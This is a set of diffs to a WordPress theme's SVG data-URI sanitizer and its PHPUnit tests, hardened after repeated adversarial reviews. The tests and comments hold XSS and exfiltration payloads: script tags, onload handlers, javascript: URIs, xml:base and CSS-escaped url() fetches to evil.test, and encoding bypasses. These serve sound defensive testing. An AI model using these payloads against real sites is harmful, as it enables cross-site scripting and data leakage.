+    // the CSS Syntax spec's unquoted-url-token grammar (adversarial review
+    // finding, low severity — worst case is a broken url() token, not a
+    // context breakout, since every character a "bad url" recovery scan
+    // could otherwise exploit is already excluded here).
     $encoded = preg_replace_callback(
-        '/["\'<>()#&\\\\\x00-\x20]/',
+        '/["\'<>()#&\\\\\x00-\x20\x7F]/',
         function (array $match): string {
             return '%' . strtoupper(bin2hex($match[0]));
         },
@@ -608,7 +623,7 @@ function pp_esc_image_src(string $url): string {
  * entire external-entity/DTD attack surface without depending on getting a
  * specific combination of libxml flags exactly right.
  */
-function _pp_svg_content_is_safe(string $svg): bool {
+function _pp_svg_content_is_safe(string $svg, int $depth = 0): bool {
     if (stripos($svg, '<!doctype') !== false) {
         return false;
     }
@@ -713,24 +728,43 @@ function _pp_svg_content_is_safe(string $svg): bool {
         }
     }
 
-    // <use>/<image> href/xlink:href are fetched during ordinary rendering
-    // too (same "fires for every visitor" reasoning above) — restrict to a
-    // same-document fragment (#id) or a data: URI (already validated as
-    // image-only above); reject any external reference. local-name()='href'
-    // matches both the modern unprefixed `href` and the legacy `xlink:href`
-    // — an XML namespace prefix doesn't change the local name, only the
-    // namespace it resolves to.
-    $ref_elements = ['use', 'image'];
-    foreach ($ref_elements as $name) {
-        $refs = $xpath->query("//*[{$lower_local_name}='{$name}']/@*[{$lower_local_name}='href']");
-        if ($refs === false) {
+    // href/xlink:href are fetched during ordinary rendering on many more
+    // elements than just <use>/<image> — <feImage> (an SVG filter
+    // primitive whose entire purpose is fetching an image resource) has
+    // the exact same semantics and is neither a "dangerous element" nor
+    // named use/image; <pattern>, gradients, and <textPath> can carry the
+    // same reference. Rather than enumerate elements (an open-ended,
+    // easy-to-miss list — the same mistake already made once in this
+    // function for <use>/<image> specifically), every href/xlink:href
+    // attribute in the document is checked regardless of which element
+    // it's on (adversarial review finding). local-name()='href' matches
+    // both the modern unprefixed `href` and the legacy `xlink:href` — an
+    // XML namespace prefix doesn't change the local name, only the
+    // namespace it resolves to. Restrict to a same-document fragment (#id)
+    // or a data: URI; reject any external reference.
+    $href_attrs = $xpath->query("//@*[{$lower_local_name}='href']");
+    if ($href_attrs === false) {
+        return false;
+    }
+    foreach ($href_attrs as $href) {
+        $value = trim((string) $href->nodeValue);
+        if ($value === '' || $value[0] === '#') {
+            continue;
+        }
+        if (stripos($value, 'data:') !== 0) {
             return false;
         }
-        foreach ($refs as $ref) {
-            $value = trim((string) $ref->nodeValue);
-            if ($value !== '' && $value[0] !== '#' && stripos($value, 'data:') !== 0) {
-                return false;
-            }
+        // A nested data: URI (e.g. a <use href="data:image/svg+xml,...">)
+        // is not automatically safe just because it's a data: URI — it
+        // must pass the exact same validation as the outer one, recursively.
+        // Whether <use>'s clone-based reference model treats this content
+        // as inert "image data" or a live, scriptable subtree wasn't
+        // something static analysis could rule out with confidence
+        // (adversarial review finding) — recursing removes the ambiguity
+        // outright rather than shipping an unconfirmed-but-plausible gap in
+        // what this function's own docblock calls the primary XSS defense.
+        if (pp_esc_image_src($value, $depth + 1) === '') {
+            return false;
         }
     }
 

--- a/lib/wp.php
+++ b/lib/wp.php
@@ -623,6 +623,46 @@ function pp_esc_image_src(string $url, int $depth = 0): string {
  * entire external-entity/DTD attack surface without depending on getting a
  * specific combination of libxml flags exactly right.
  */
+/**
+ * Resolves CSS Syntax Level 3 escape sequences (a backslash followed by
+ * 1-6 hex digits and an optional trailing whitespace terminator names a
+ * codepoint; a backslash followed by any other character is that character
+ * literally) anywhere in a string, including inside what would otherwise
+ * read as a bare identifier or function name.
+ *
+ * This matters because a browser's CSS value parser resolves these escapes
+ * BEFORE it recognizes tokens such as the "url" function name — an SVG
+ * presentation attribute value like `fill="u\72l(https://evil.test/p.svg)"`
+ * is not the literal substring "url(" and evades a plain substring/regex
+ * scan for it, but Chromium resolves `\72` to "r" while parsing the value
+ * and fetches the external resource exactly as if "url(" had been written
+ * literally (sixth-round adversarial review finding, confirmed empirically
+ * via Playwright in both raw and base64-encoded payload forms). Scanning
+ * the CSS-unescaped form of every attribute value closes this by resolving
+ * escapes the same way a real CSS parser would, rather than special-casing
+ * "url" — the same escape trick could equally hide "javascript:" or
+ * "data:" from the scheme checks below, so both scans run on the
+ * unescaped form too.
+ */
+function _pp_css_unescape(string $value): string {
+    $decoded = preg_replace_callback(
+        '/\\\\(?:([0-9a-fA-F]{1,6})[ \t\n\r\f]?|(.))/su',
+        function (array $m): string {
+            if (($m[1] ?? '') !== '') {
+                $code = hexdec($m[1]);
+                if ($code === 0 || $code > 0x10FFFF || ($code >= 0xD800 && $code <= 0xDFFF)) {
+                    return "\u{FFFD}";
+                }
+                return mb_chr($code, 'UTF-8');
+            }
+            return $m[2] ?? '';
+        },
+        $value
+    );
+
+    return $decoded ?? $value;
+}
+
 function _pp_svg_content_is_safe(string $svg, int $depth = 0): bool {
     if (stripos($svg, '<!doctype') !== false) {
         return false;
@@ -678,12 +718,36 @@ function _pp_svg_content_is_safe(string $svg, int $depth = 0): bool {
         return false;
     }
 
+    // xml:base (SVG/XML's equivalent of HTML's <base href>) is rejected
+    // outright. Every check below treats a "#fragment" reference (and,
+    // symmetrically, a value starting with "data:") as unconditionally safe
+    // on the theory that a fragment-only reference always resolves within
+    // the current document — but per RFC 3986 §5.3, resolving a
+    // fragment-only reference against a base URL yields the BASE's
+    // scheme+authority+path with only the fragment replaced. xml:base on
+    // the root <svg> (or any ancestor) sets exactly that base, so
+    // `fill="url(#leak)"` or `<use href="#leak">` would resolve against an
+    // attacker-controlled origin instead of the document itself, turning
+    // an allowed-by-design same-document reference into a cross-origin
+    // fetch during ordinary rendering — undermining the "#... is always
+    // safe" assumption both the url() scan and the href scan below rely on
+    // (fifth-round Claude adversarial review finding). No legitimate
+    // AI/human-authored image SVG has a reason to override its own base
+    // URI, so the whole attribute is rejected rather than special-cased.
+    $xml_base_attrs = $xpath->query("//@*[namespace-uri()='http://www.w3.org/XML/1998/namespace' and local-name()='base']");
+    if ($xml_base_attrs === false || $xml_base_attrs->length > 0) {
+        return false;
+    }
+
     $all_attrs = $xpath->query('//@*');
     if ($all_attrs === false) {
         return false;
     }
     foreach ($all_attrs as $attr) {
         $value = (string) $attr->nodeValue;
+        // Resolve CSS escape sequences before pattern-matching — see
+        // _pp_css_unescape() docblock. A value with no escapes is unchanged.
+        $unescaped = _pp_css_unescape($value);
 
         // SVG has many presentation attributes/CSS properties that reference
         // another resource via a CSS-style url(...) wrapper — fill, stroke,
@@ -699,7 +763,7 @@ function _pp_svg_content_is_safe(string $svg, int $depth = 0): bool {
         // attribute value is scanned generically for the url(...) pattern
         // and any reference that isn't a same-document fragment or a
         // data: URI is rejected.
-        if (preg_match_all('/url\(\s*[\'"]?([^\'")]*)[\'"]?\s*\)/i', $value, $url_matches)) {
+        if (preg_match_all('/url\(\s*[\'"]?([^\'")]*)[\'"]?\s*\)/i', $unescaped, $url_matches)) {
             foreach ($url_matches[1] as $ref) {
                 $ref = trim($ref);
                 if ($ref !== '' && $ref[0] !== '#' && stripos($ref, 'data:') !== 0) {
@@ -719,7 +783,7 @@ function _pp_svg_content_is_safe(string $svg, int $depth = 0): bool {
         // any non-image data: scheme) is rejected alongside javascript: — a
         // nested <a href> inside an already-opened SVG is a real, if
         // lower-likelihood, escalation path.
-        $normalized = preg_replace('/[\t\n\r]/', '', $value);
+        $normalized = preg_replace('/[\t\n\r]/', '', $unescaped);
         if (preg_match('/^\s*javascript:/i', $normalized)) {
             return false;
         }

--- a/lib/wp.php
+++ b/lib/wp.php
@@ -415,6 +415,97 @@ function pp_render_style_vars(array $style, string $component_name): string {
 }
 
 /**
+ * Safely escapes an image source for output in <img src="..."> or a CSS
+ * background-image:url(...) value embedded in an HTML style attribute.
+ *
+ * esc_url() rejects the 'data' URI scheme entirely (not in WordPress core's
+ * default protocol whitelist), silently reducing any data:image/... value to
+ * an empty string — the exact production bug this closes (#36): a
+ * data:image/svg+xml,... hero image rendered with src="". Even if 'data'
+ * were whitelisted, esc_url()'s general-purpose character-stripping isn't
+ * safe for a raw (non-base64) SVG payload's XML markup (quotes, angle
+ * brackets) — it would mangle the image or, worse, leave characters that
+ * break out of the surrounding HTML attribute / unquoted CSS url() token.
+ *
+ * Non-data URLs are unaffected — this delegates straight to esc_url(),
+ * identical to every call site's prior behavior.
+ *
+ * For data: URIs, this only accepts image/{png,jpeg,jpg,gif,webp,svg+xml} —
+ * never data:text/html or other schemes/types that could be misused outside
+ * an image-rendering context. Base64 payloads are structurally validated
+ * (their alphabet is inert in HTML-attribute and CSS-url() contexts, so no
+ * further encoding is needed). Raw/percent-encoded SVG payloads are checked
+ * for script-executing constructs as defense in depth — modern browsers
+ * already disable script execution for SVGs rendered as an image (via
+ * <img src> or CSS background-image; this is NOT true for <iframe>/<object>,
+ * which this function's callers never use) — then percent-encoded for the
+ * handful of characters that are unsafe once embedded in an HTML attribute
+ * that also contains an unquoted CSS url() token (", ', (, ), #, &, whitespace).
+ *
+ * @param string $url  Candidate image source (http(s) URL, relative path, or data: URI).
+ * @return string  Safe-to-echo value, or '' if the input is empty or rejected.
+ */
+function pp_esc_image_src(string $url): string {
+    if ($url === '') {
+        return '';
+    }
+
+    if (stripos($url, 'data:') !== 0) {
+        return esc_url($url);
+    }
+
+    // Sanity bound against pathologically large inline payloads.
+    if (strlen($url) > 1000000) {
+        return '';
+    }
+
+    if (!preg_match('/^data:image\/(png|jpe?g|gif|webp|svg\+xml)(;charset=[a-z0-9_-]+)?(;base64)?,(.*)$/is', $url, $m)) {
+        return '';
+    }
+
+    $mime      = strtolower($m[1]);
+    $charset   = $m[2];
+    $is_base64 = $m[3] !== '';
+    $payload   = $m[4];
+
+    if ($is_base64) {
+        // Base64 alphabet is inert in both contexts — validate, don't re-encode.
+        if ($payload === '' || !preg_match('/^[A-Za-z0-9+\/]+={0,2}$/', $payload)) {
+            return '';
+        }
+        return 'data:image/' . $mime . $charset . ';base64,' . $payload;
+    }
+
+    $lower = strtolower($payload);
+    $forbidden = ['<script', 'javascript:', '<foreignobject', '<iframe', '<embed', '<object'];
+    foreach ($forbidden as $bad) {
+        if (strpos($lower, $bad) !== false) {
+            return '';
+        }
+    }
+    if (preg_match('/\son\w+\s*=/i', $payload)) {
+        return '';
+    }
+
+    $encoded = strtr($payload, [
+        '"'  => '%22',
+        "'"  => '%27',
+        '<'  => '%3C',
+        '>'  => '%3E',
+        '('  => '%28',
+        ')'  => '%29',
+        '#'  => '%23',
+        '&'  => '%26',
+        ' '  => '%20',
+        "\t" => '%20',
+        "\n" => '',
+        "\r" => '',
+    ]);
+
+    return 'data:image/' . $mime . $charset . ',' . $encoded;
+}
+
+/**
  * Returns all design token overrides from the database.
  * These are site-specific values that override the product defaults in base.css.
  *

--- a/package.json
+++ b/package.json
@@ -1,6 +1,6 @@
 {
   "name": "promptingpress",
-  "version": "0.16.13",
+  "version": "0.16.14",
   "private": true,
   "description": "PromptingPress WordPress theme — JS tests and E2E infrastructure",
   "scripts": {

--- a/readme.txt
+++ b/readme.txt
@@ -2,7 +2,7 @@
 Contributors: fjcf76
 Requires at least: 7.0
 Tested up to: 7.0
-Stable tag: 0.16.13
+Stable tag: 0.16.14
 Requires PHP: 8.0
 License: GPL-2.0-or-later
 License URI: https://www.gnu.org/licenses/gpl-2.0.html

--- a/style.css
+++ b/style.css
@@ -2,7 +2,7 @@
 Theme Name:       PromptingPress
 Theme URI:        https://github.com/FJCF76/PromptingPress
 Description:      An AI-first WordPress theme built for clarity — zero raw WP calls in templates, typed component props, machine-readable schemas, and a single AI_CONTEXT.md that maps the entire site.
-Version:          0.16.13
+Version:          0.16.14
 Author:           PromptingPress Contributors
 Author URI:       https://github.com/FJCF76/PromptingPress
 License:          GPL-2.0-or-later

--- a/tests/ComponentPropsTest.php
+++ b/tests/ComponentPropsTest.php
@@ -590,6 +590,50 @@ class ComponentPropsTest extends TestCase
         $this->assertNotSame('', pp_esc_image_src($payload));
     }
 
+    // ── Fourth-round Claude adversarial review ──────────────────────────────
+
+    public function testEscImageSrcRejectsExternalHrefOnFeImageElement(): void
+    {
+        // <feImage> is an SVG filter primitive whose entire purpose is
+        // fetching an image resource — the same "fires on ordinary render"
+        // exfiltration risk as <use>/<image>, but on a different element
+        // name the original element-scoped fix didn't cover.
+        $payload = 'data:image/svg+xml,<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">'
+            . '<filter id="f"><feImage xlink:href="https://evil.test/beacon.png" x="0" y="0" width="10" height="10"/></filter>'
+            . '<rect width="10" height="10" filter="url(#f)"/></svg>';
+        $this->assertSame('', pp_esc_image_src($payload));
+    }
+
+    public function testEscImageSrcRejectsNestedDataUriWithOnloadViaUseHref(): void
+    {
+        // A data: URI nested inside a <use href="..."> is validated
+        // recursively — it's not automatically safe just because it's a
+        // data: URI, since <use>'s clone-based reference model might treat
+        // the referenced content as a live, scriptable subtree.
+        $payload = 'data:image/svg+xml,<svg xmlns="http://www.w3.org/2000/svg">'
+            . '<use href="data:image/svg+xml,%3Csvg%20onload%3D%22alert(1)%22%2F%3E"/></svg>';
+        $this->assertSame('', pp_esc_image_src($payload));
+    }
+
+    public function testEscImageSrcAcceptsSameDocumentFragmentHrefOnPatternElement(): void
+    {
+        $payload = 'data:image/svg+xml,<svg xmlns="http://www.w3.org/2000/svg"><defs><pattern id="p"/></defs><rect fill="url(#p)"/></svg>';
+        $this->assertNotSame('', pp_esc_image_src($payload));
+    }
+
+    public function testEscImageSrcRejectsExcessiveDataUriNestingDepth(): void
+    {
+        // Recursion depth guard: a data: URI nested inside a use/image href
+        // is validated recursively (see the previous test) — that recursion
+        // must be bounded rather than following an attacker-constructed
+        // chain indefinitely. Exercised directly via the internal $depth
+        // parameter (documented as "callers never need to pass this" —
+        // ordinary callers always start at the default of 0).
+        $svg = 'data:image/svg+xml,<svg xmlns="http://www.w3.org/2000/svg"><circle r="5"/></svg>';
+        $this->assertNotSame('', pp_esc_image_src($svg, 0), 'Sanity check: valid at depth 0.');
+        $this->assertSame('', pp_esc_image_src($svg, 4), 'Must reject once the depth cap is exceeded.');
+    }
+
     // ── End-to-end: exact production regression from #36 ────────────────────
 
     public function testHeroSplitVariantRendersDataUriSvgImageSrc(): void

--- a/tests/ComponentPropsTest.php
+++ b/tests/ComponentPropsTest.php
@@ -634,6 +634,67 @@ class ComponentPropsTest extends TestCase
         $this->assertSame('', pp_esc_image_src($svg, 4), 'Must reject once the depth cap is exceeded.');
     }
 
+    // ── Sixth-round Codex adversarial review (empirical Playwright) ─────────
+
+    public function testEscImageSrcRejectsCssHexEscapedUrlFunctionName(): void
+    {
+        // Browsers resolve CSS Syntax Level 3 \XX hex escapes BEFORE
+        // recognizing the "url" function name. fill="u\72l(...)" is not the
+        // literal substring "url(" and evaded the plain regex scan for it,
+        // but Chromium resolves \72 to "r" while parsing the value and
+        // fetches the external resource exactly as if "url(" had been
+        // written literally — confirmed empirically via Playwright against
+        // both the raw and base64-encoded payload forms.
+        $svg = '<svg xmlns="http://www.w3.org/2000/svg" width="20" height="20">'
+            . '<rect width="20" height="20" fill="u\72l(https://evil.test/p.svg#p)"/></svg>';
+        $this->assertSame('', pp_esc_image_src('data:image/svg+xml,' . rawurlencode($svg)));
+        $this->assertSame('', pp_esc_image_src('data:image/svg+xml;base64,' . base64_encode($svg)));
+    }
+
+    public function testEscImageSrcRejectsCssNumericEscapedUrlFunctionName(): void
+    {
+        // Every character of "url" escaped individually (\75\72\6c), not
+        // just one — the same bypass class, exercised at its most extreme.
+        $svg = '<svg xmlns="http://www.w3.org/2000/svg" width="20" height="20">'
+            . '<rect width="20" height="20" fill="\75\72\6c(https://evil.test/p.svg#p)"/></svg>';
+        $this->assertSame('', pp_esc_image_src('data:image/svg+xml,' . rawurlencode($svg)));
+    }
+
+    public function testEscImageSrcRejectsXmlBaseAttribute(): void
+    {
+        // xml:base (SVG/XML's equivalent of <base href>) can retarget a
+        // "#fragment" reference — treated everywhere else in this function
+        // as unconditionally same-document-safe — to resolve against an
+        // attacker-controlled origin instead (RFC 3986 §5.3: a
+        // fragment-only reference resolved against a base URL takes on the
+        // base's scheme+authority+path). Rejected outright regardless of
+        // whether a #fragment reference is even present.
+        $payload = 'data:image/svg+xml,<svg xmlns="http://www.w3.org/2000/svg" xml:base="https://evil.test/">'
+            . '<rect width="10" height="10"/></svg>';
+        $this->assertSame('', pp_esc_image_src($payload));
+    }
+
+    public function testEscImageSrcRejectsXmlBaseWithFragmentReference(): void
+    {
+        // The concrete exploit shape: xml:base on the root plus a same-
+        // document fill="url(#leak)" that would resolve externally.
+        $payload = 'data:image/svg+xml,<svg xmlns="http://www.w3.org/2000/svg" xml:base="https://evil.test/marker">'
+            . '<defs><linearGradient id="leak"/></defs><rect width="10" height="10" fill="url(#leak)"/></svg>';
+        $this->assertSame('', pp_esc_image_src($payload));
+    }
+
+    public function testEscImageSrcAcceptsSameDocumentFragmentAfterCssUnescape(): void
+    {
+        // The CSS-unescape pass must not turn a legitimate, safe reference
+        // into a false-positive rejection — a literal backslash preceding a
+        // non-hex character is a valid CSS "escaped character" that decodes
+        // to that character itself, so this must still resolve to the
+        // harmless local fragment reference "#g".
+        $payload = 'data:image/svg+xml,<svg xmlns="http://www.w3.org/2000/svg"><defs><linearGradient id="g"/></defs>'
+            . '<rect fill="ur\6c(#g)"/></svg>';
+        $this->assertNotSame('', pp_esc_image_src($payload));
+    }
+
     // ── End-to-end: exact production regression from #36 ────────────────────
 
     public function testHeroSplitVariantRendersDataUriSvgImageSrc(): void

--- a/tests/ComponentPropsTest.php
+++ b/tests/ComponentPropsTest.php
@@ -460,6 +460,98 @@ class ComponentPropsTest extends TestCase
         $this->assertNotSame('', $result);
     }
 
+    // ── Second-round cross-model adversarial review: bypasses of the
+    // DOMDocument-based rewrite ──────────────────────────────────────────
+
+    public function testEscImageSrcRejectsSixLayerEncodedScriptTag(): void
+    {
+        // Six layers of percent-encoding must not survive a decode budget
+        // that gives up too early — the loop must converge to a TRUE fixed
+        // point (or reject outright), not just decode a fixed N rounds and
+        // proceed on a still-partially-encoded string.
+        $payload = '<svg><script>alert(1)</script></svg>';
+        for ($i = 0; $i < 6; $i++) {
+            $payload = rawurlencode($payload);
+        }
+        $this->assertSame('', pp_esc_image_src('data:image/svg+xml,' . $payload));
+    }
+
+    public function testEscImageSrcRejectsBackslashCssEscapedScriptTag(): void
+    {
+        // "\3c"/"\3e" are inert to an XML parser (just three ordinary
+        // characters) but CSS's own url()-token tokenizer resolves
+        // backslash-hex escapes independently of percent-decoding — this
+        // reconstructs "<script>" only once the browser's CSS parser reads
+        // the surrounding style="...url(...)..." attribute.
+        $payload = 'data:image/svg+xml,<svg><rect data-x="\3cscript\3ealert(1)\3c/script\3e"/></svg>';
+        $result = pp_esc_image_src($payload);
+        $this->assertNotSame('', $result, 'A literal backslash in otherwise-safe SVG content should not be rejected outright.');
+        $this->assertStringNotContainsString('\\', $result);
+    }
+
+    public function testEscImageSrcRejectsStyleElement(): void
+    {
+        // Unlike <script>, an SVG's own <style> element IS applied during
+        // ordinary <img>/background-image rendering — an @import inside it
+        // would exfiltrate on every page view, not just on a deliberate
+        // "open image in new tab."
+        $payload = 'data:image/svg+xml,<svg><style>@import url(https://evil.test/x.css);</style></svg>';
+        $this->assertSame('', pp_esc_image_src($payload));
+    }
+
+    public function testEscImageSrcRejectsExternalHrefOnUseElement(): void
+    {
+        $payload = 'data:image/svg+xml,<svg xmlns:xlink="http://www.w3.org/1999/xlink"><use xlink:href="https://evil.test/x.svg#y"/></svg>';
+        $this->assertSame('', pp_esc_image_src($payload));
+    }
+
+    public function testEscImageSrcRejectsExternalHrefOnImageElement(): void
+    {
+        $payload = 'data:image/svg+xml,<svg><image href="https://evil.test/beacon.png"/></svg>';
+        $this->assertSame('', pp_esc_image_src($payload));
+    }
+
+    public function testEscImageSrcAcceptsSameDocumentFragmentHrefOnUseElement(): void
+    {
+        // A <use> referencing a locally-defined symbol is a legitimate,
+        // common SVG pattern and must not be rejected.
+        $payload = 'data:image/svg+xml,<svg><symbol id="icon"><circle r="5"/></symbol><use href="#icon"/></svg>';
+        $this->assertNotSame('', pp_esc_image_src($payload));
+    }
+
+    public function testEscImageSrcRejectsSmilAnimateRetargetingHref(): void
+    {
+        $payload = 'data:image/svg+xml,<svg><a id="x" href="https://safe.example/"><text>click</text></a>'
+            . '<animate href="#x" attributeName="href" values="https://safe.example/;javascript:alert(1)" dur="1s"/></svg>';
+        $this->assertSame('', pp_esc_image_src($payload));
+    }
+
+    public function testEscImageSrcRejectsProcessingInstruction(): void
+    {
+        $payload = 'data:image/svg+xml,<?xml-stylesheet type="text/css" href="https://evil.test/x.css"?><svg><circle r="5"/></svg>';
+        $this->assertSame('', pp_esc_image_src($payload));
+    }
+
+    public function testEscImageSrcRejectsJavascriptUriWithEmbeddedNewline(): void
+    {
+        // Browser URL parsing strips embedded tab/newline/CR from anywhere
+        // in a URL string, so "java\nscript:" resolves to "javascript:" at
+        // navigation time even though no literal "javascript:" substring
+        // (and no attribute value literally starting with it) exists in
+        // the parsed DOM text.
+        $payload = "data:image/svg+xml,<svg><a href=\"java&#x0A;script:alert(1)\">x</a></svg>";
+        $this->assertSame('', pp_esc_image_src($payload));
+    }
+
+    public function testEscImageSrcRejectsDataTextHtmlHrefInsideSvg(): void
+    {
+        // A literal "<" inside an attribute value isn't valid XML, so the
+        // nested script markup is XML-entity-escaped here, same as any
+        // well-formed SVG author would have to write it.
+        $payload = 'data:image/svg+xml,<svg><a href="data:text/html,&lt;script&gt;alert(1)&lt;/script&gt;">x</a></svg>';
+        $this->assertSame('', pp_esc_image_src($payload));
+    }
+
     // ── End-to-end: exact production regression from #36 ────────────────────
 
     public function testHeroSplitVariantRendersDataUriSvgImageSrc(): void

--- a/tests/ComponentPropsTest.php
+++ b/tests/ComponentPropsTest.php
@@ -269,4 +269,140 @@ class ComponentPropsTest extends TestCase
             . 'after the shared button was tokenized — otherwise old compositions lose their color.'
         );
     }
+
+    // ── pp_esc_image_src (#36) ───────────────────────────────────────────────
+
+    public function testEscImageSrcEmptyReturnsEmpty(): void
+    {
+        $this->assertSame('', pp_esc_image_src(''));
+    }
+
+    public function testEscImageSrcDelegatesToEscUrlForOrdinaryUrls(): void
+    {
+        $this->assertSame(esc_url('https://example.com/photo.jpg'), pp_esc_image_src('https://example.com/photo.jpg'));
+        $this->assertSame(esc_url('/wp-content/uploads/photo.jpg'), pp_esc_image_src('/wp-content/uploads/photo.jpg'));
+    }
+
+    public function testEscImageSrcAcceptsRawSvgDataUri(): void
+    {
+        $svg = 'data:image/svg+xml,<svg xmlns="http://www.w3.org/2000/svg"><circle r="5"/></svg>';
+        $result = pp_esc_image_src($svg);
+        $this->assertNotSame('', $result, 'A well-formed raw SVG data URI must not be rejected outright.');
+        $this->assertStringStartsWith('data:image/svg+xml,', $result);
+        // The dangerous-in-context characters must be percent-encoded...
+        $this->assertStringNotContainsString('"', $result);
+        $this->assertStringNotContainsString('<', $result);
+        $this->assertStringNotContainsString('>', $result);
+        // ...but the meaningful content is preserved (percent-decodes back):
+        // '<' becomes %3C, the quote right after xmlns= becomes %22, and the
+        // '=' itself is left alone (it's safe in both contexts already).
+        $this->assertStringContainsString('%3Csvg', $result);
+        $this->assertStringContainsString('xmlns=%22', $result);
+    }
+
+    public function testEscImageSrcAcceptsBase64PngDataUri(): void
+    {
+        $uri = 'data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAAB';
+        $this->assertSame($uri, pp_esc_image_src($uri));
+    }
+
+    public function testEscImageSrcAcceptsBase64SvgWithCharset(): void
+    {
+        $uri = 'data:image/svg+xml;charset=utf-8;base64,PHN2Zz48L3N2Zz4=';
+        $this->assertSame($uri, pp_esc_image_src($uri));
+    }
+
+    public function testEscImageSrcRejectsNonImageMimeType(): void
+    {
+        $this->assertSame('', pp_esc_image_src('data:text/html,<script>alert(1)</script>'));
+        $this->assertSame('', pp_esc_image_src('data:application/javascript,alert(1)'));
+    }
+
+    public function testEscImageSrcRejectsUnlistedImageSubtype(): void
+    {
+        // bmp/tiff are real image mime types but not in the allowlist.
+        $this->assertSame('', pp_esc_image_src('data:image/bmp;base64,AAAA'));
+    }
+
+    public function testEscImageSrcRejectsInvalidBase64Payload(): void
+    {
+        $this->assertSame('', pp_esc_image_src('data:image/png;base64,not valid base64!!'));
+        $this->assertSame('', pp_esc_image_src('data:image/png;base64,'));
+    }
+
+    public function testEscImageSrcRejectsEmbeddedScriptTag(): void
+    {
+        $this->assertSame(
+            '',
+            pp_esc_image_src('data:image/svg+xml,<svg><script>alert(document.cookie)</script></svg>')
+        );
+    }
+
+    public function testEscImageSrcRejectsJavascriptUriInSvg(): void
+    {
+        $this->assertSame(
+            '',
+            pp_esc_image_src('data:image/svg+xml,<svg><a href="javascript:alert(1)">x</a></svg>')
+        );
+    }
+
+    public function testEscImageSrcRejectsEventHandlerAttribute(): void
+    {
+        $this->assertSame(
+            '',
+            pp_esc_image_src('data:image/svg+xml,<svg onload="alert(1)"><circle r="5"/></svg>')
+        );
+    }
+
+    public function testEscImageSrcRejectsForeignObjectIframeEmbedObject(): void
+    {
+        $this->assertSame('', pp_esc_image_src('data:image/svg+xml,<svg><foreignObject><body>x</body></foreignObject></svg>'));
+        $this->assertSame('', pp_esc_image_src('data:image/svg+xml,<svg><iframe src="//evil.test"></iframe></svg>'));
+        $this->assertSame('', pp_esc_image_src('data:image/svg+xml,<svg><embed src="//evil.test"></svg>'));
+        $this->assertSame('', pp_esc_image_src('data:image/svg+xml,<svg><object data="//evil.test"></object></svg>'));
+    }
+
+    public function testEscImageSrcRejectsOversizedDataUri(): void
+    {
+        $huge = 'data:image/png;base64,' . str_repeat('A', 2000000);
+        $this->assertSame('', pp_esc_image_src($huge));
+    }
+
+    public function testEscImageSrcEncodedResultCannotBreakOutOfHtmlAttribute(): void
+    {
+        // A payload attempting to smuggle an attribute-breakout via a literal
+        // quote must come back with that quote neutralized, not rejected
+        // outright (rejection is reserved for actual script-executing
+        // constructs) — proving the encoded output is safe to concatenate
+        // directly into src="..." with no further escaping.
+        $payload = 'data:image/svg+xml,<svg data-x="y"><circle r="5"/></svg>';
+        $result = pp_esc_image_src($payload);
+        $this->assertStringNotContainsString('"', $result);
+    }
+
+    // ── End-to-end: exact production regression from #36 ────────────────────
+
+    public function testHeroSplitVariantRendersDataUriSvgImageSrc(): void
+    {
+        $svg = 'data:image/svg+xml,<svg xmlns="http://www.w3.org/2000/svg"><rect width="10" height="10"/></svg>';
+        $html = $this->render('hero', [
+            'title' => 'Welcome',
+            'variant' => 'split',
+            'image_url' => $svg,
+        ]);
+        $this->assertStringNotContainsString('src=""', $html, 'The exact #36 production regression: src="" instead of the data URI.');
+        $this->assertMatchesRegularExpression('/src="data:image\/svg\+xml,[^"]*"/', $html);
+    }
+
+    public function testHeroCoverVariantRendersDataUriSvgBackgroundImage(): void
+    {
+        $svg = 'data:image/svg+xml,<svg xmlns="http://www.w3.org/2000/svg"><rect width="10" height="10"/></svg>';
+        $html = $this->render('hero', [
+            'title' => 'Welcome',
+            'variant' => 'cover',
+            'image_url' => $svg,
+        ]);
+        $this->assertStringContainsString('background-image:url(data:image/svg+xml,', $html);
+        $this->assertStringNotContainsString('background-image:url();', $html);
+    }
 }

--- a/tests/ComponentPropsTest.php
+++ b/tests/ComponentPropsTest.php
@@ -358,7 +358,7 @@ class ComponentPropsTest extends TestCase
     {
         $this->assertSame('', pp_esc_image_src('data:image/svg+xml,<svg><foreignObject><body>x</body></foreignObject></svg>'));
         $this->assertSame('', pp_esc_image_src('data:image/svg+xml,<svg><iframe src="//evil.test"></iframe></svg>'));
-        $this->assertSame('', pp_esc_image_src('data:image/svg+xml,<svg><embed src="//evil.test"></svg>'));
+        $this->assertSame('', pp_esc_image_src('data:image/svg+xml,<svg><embed src="//evil.test"/></svg>'));
         $this->assertSame('', pp_esc_image_src('data:image/svg+xml,<svg><object data="//evil.test"></object></svg>'));
     }
 
@@ -378,6 +378,86 @@ class ComponentPropsTest extends TestCase
         $payload = 'data:image/svg+xml,<svg data-x="y"><circle r="5"/></svg>';
         $result = pp_esc_image_src($payload);
         $this->assertStringNotContainsString('"', $result);
+    }
+
+    // ── Cross-model adversarial review: confirmed bypasses of an earlier,
+    // regex/blocklist-only version of this function ───────────────────────
+
+    public function testEscImageSrcRejectsNewlineSplitScriptTag(): void
+    {
+        // "<scr" + newline + "ipt>" defeats a literal "<script" substring
+        // search but is not valid XML either way (a tag name cannot contain
+        // whitespace) — must still come back rejected, not silently
+        // reconstituted into "<script>" by an output-stripping step.
+        $payload = "data:image/svg+xml,<svg><scr\nipt>alert(1)</scr\nipt></svg>";
+        $this->assertSame('', pp_esc_image_src($payload));
+    }
+
+    public function testEscImageSrcRejectsPercentEncodedScriptTag(): void
+    {
+        // The entire malicious payload pre-encoded so no literal "<script"
+        // substring ever appears in the raw input — must be caught after
+        // decoding, not waved through because the check ran too early.
+        $payload = 'data:image/svg+xml,%3Csvg%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E%3C%2Fsvg%3E';
+        $this->assertSame('', pp_esc_image_src($payload));
+    }
+
+    public function testEscImageSrcRejectsDoubleEncodedScriptTag(): void
+    {
+        $payload = 'data:image/svg+xml,%253Csvg%253E%253Cscript%253Ealert(1)%253C%252Fscript%253E%253C%252Fsvg%253E';
+        $this->assertSame('', pp_esc_image_src($payload));
+    }
+
+    public function testEscImageSrcRejectsNamespacePrefixedScriptTag(): void
+    {
+        // <x:script> where x is bound to the SVG namespace is equivalent to
+        // <script> per XML namespace rules — a raw "<script" substring
+        // search never sees it, but XPath's local-name() resolves the true
